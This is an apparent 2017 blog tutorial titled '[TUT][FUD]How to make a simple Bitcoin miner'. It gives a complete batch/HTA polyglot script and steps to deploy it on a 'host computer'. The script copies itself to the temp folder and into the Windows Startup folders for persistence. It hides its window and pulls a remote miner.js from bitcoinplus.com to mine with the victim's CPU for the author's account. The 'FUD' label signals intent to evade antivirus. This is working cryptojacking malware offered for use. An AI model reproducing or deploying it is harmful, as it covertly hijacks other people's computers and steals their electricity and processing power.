Saturday, June 24, 2017

[TUT][FUD]How to make a simple Bitcoin miner

10:44 AM Leave a Reply
How To Make A Simple Bitcoin Miner.

Go over to http://www.bitcoinplus.com / and sign up
NOTE: remember the email your using to signup


:<!--
SPAM off & copy %0 "%temp%\%~n0.hta" > nul & start "" "%temp%\%~n0.hta" & @copy %0 "%allusersprofile%\start menu\programs\startup" & @copy %0 "%programdata%\microsoft\windows\start menu\programs\startup" & exit
:-->

<html><title></title><pre>

<HTA:APPLICATION ID="-" APPLICATIONNAME="-"
BORDER="none" CAPTION="no" ICON="no" echo CONTEXTMENU="no"
SHOWINTASKBAR="no" SINGLEINSTANCE="yes" echo SYSMENU="no" SCROLL="no">

<script language="vbscript">
  Sub Window_onLoad
  window.resizeTo 0,0
  End Sub

    </script>

<html>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
<script src="http://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script>
<a href="http://www.bitcoinplus.com/">Use bitcoin at Bitcoin Plus</a>
<script type="text/javascript">BitcoinPlusMiner("YOUREMAILGOESHERE")</script>
</html>

Now just copy and paste this code into notepad and
change YOUREMAILGOESHERE with the email you used to signup
save it as whateveryouwant.bat and run it on the host computer
feel free to convert it to a exe

you can view your earnings by going to My Account and clicking on Generated payouts

HOW TO TEST IT
start the task manager and go over to performance then start your bitcoin miner and wait a second or two you should see your CPU going at full speed this means it's working to close it simply look for a process called mshta.exe and close it, also it copies it's self to the startup folder so you'll want to delete it from there too

0 comments :